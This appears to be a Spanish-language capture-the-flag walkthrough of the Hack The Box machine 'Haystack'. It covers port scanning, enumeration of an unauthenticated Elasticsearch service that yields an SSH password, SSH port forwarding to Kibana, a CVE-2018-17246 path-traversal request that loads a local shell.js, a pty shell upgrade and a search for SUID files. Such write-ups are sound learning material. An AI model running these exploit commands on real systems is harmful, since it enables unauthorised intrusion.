Haystack - HackMD

# Haystack ~~~ nmap -sS -Pn --min-rate 5000 10.10.10.115 -oG allPorts ~~~ ![](https://i.imgur.com/YDYSVyk.png) ### Puerto 80 ![](https://i.imgur.com/vmgqw4B.png) ![](https://i.imgur.com/QNdcimF.png) ![](https://i.imgur.com/r8FZpkF.png) ~~~ exiftool index.jpeg ~~~ ![](https://i.imgur.com/DCKSuyZ.png) ~~~ strings index.jpeg ~~~ ![](https://i.imgur.com/7rNsRu9.png) ![](https://i.imgur.com/YCoTatw.png) ### Puerto 9200 ![](https://i.imgur.com/WPDQzS9.png) ~~~ curl -s -X GET "http://10.10.10.115:9200/_cluster" curl -s -X GET "http://10.10.10.115:9200/_security" curl -s -X GET "http://10.10.10.115:9200/_cat" curl -s -X GET "10.10.10.115:9200/_cat" ; echo ~~~ ![](https://i.imgur.com/g6WrgVH.png) ~~~ curl -s -X GET "http://10.10.10.115:9200/_cat/indices?v" ; echo ~~~ ![](https://i.imgur.com/fC81Wat.png) ~~~ curl -s -X GET "http://10.10.10.115:9200/quotes" | jq ~~~ ![](https://i.imgur.com/H2ko8lZ.png) ~~~ curl -s -X GET "http://10.10.10.115:9200/bank/_search?pretty=true" | jq ~~~ ![](https://i.imgur.com/9HNeuYZ.png) ~~~ curl -s -X GET "http://10.10.10.115:9200/quotes/_search?pretty=true&size=10000" | jq | grep "clave" ~~~ ![](https://i.imgur.com/UXknA2r.png) ![](https://i.imgur.com/G9XRGZc.png) security spanish.is.key ### Puerto 22 ![](https://i.imgur.com/8RiYy8r.png) ## Reconocimiento dentro del objetivo #### Puertos abiertos en la máquina ~~~ netstat -nat ss -nltp ~~~ ![](https://i.imgur.com/HswvO5j.png) #### 5601 - Kibana ![](https://i.imgur.com/74DkvdK.png) #### Local Port Forwarding Antes: ![](https://i.imgur.com/ssFmzrq.png) Ahora: ~~~ ssh security@10.10.10.115 -L 5601:localhost:5601 ~~~ ![](https://i.imgur.com/6p0npXv.png) ![](https://i.imgur.com/v4N6nj4.png) ### Kibana ![](https://i.imgur.com/pzy3MCJ.png) #### CVE-2018-17246 ![](https://i.imgur.com/J1hAxQu.png) ![](https://i.imgur.com/UN8XyQo.png) ![](https://i.imgur.com/CY3Jd1E.png) ![](https://i.imgur.com/NqaSB7O.png) ~~~ curl -s -X GET "http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/shell.js" ~~~ #### STTY ~~~ python -c 'import pty;pty.spawn("/bin/bash")' ~~~ ![](https://i.imgur.com/FyOegqT.png) ### Busqueda de archivos ~~~ find \-perm -4000 2>/dev/null find / -user kibana 2>/dev/null ~~~ ![](https://i.imgur.com/4bKbGwe.png) Archivos que ejecuta root: ![](https://i.imgur.com/yONLXuB.png) ![](https://i.imgur.com/1fxaM1t.png) ![](https://i.imgur.com/QUdJ0Zd.png) ![](https://i.imgur.com/Z8uVQc7.png)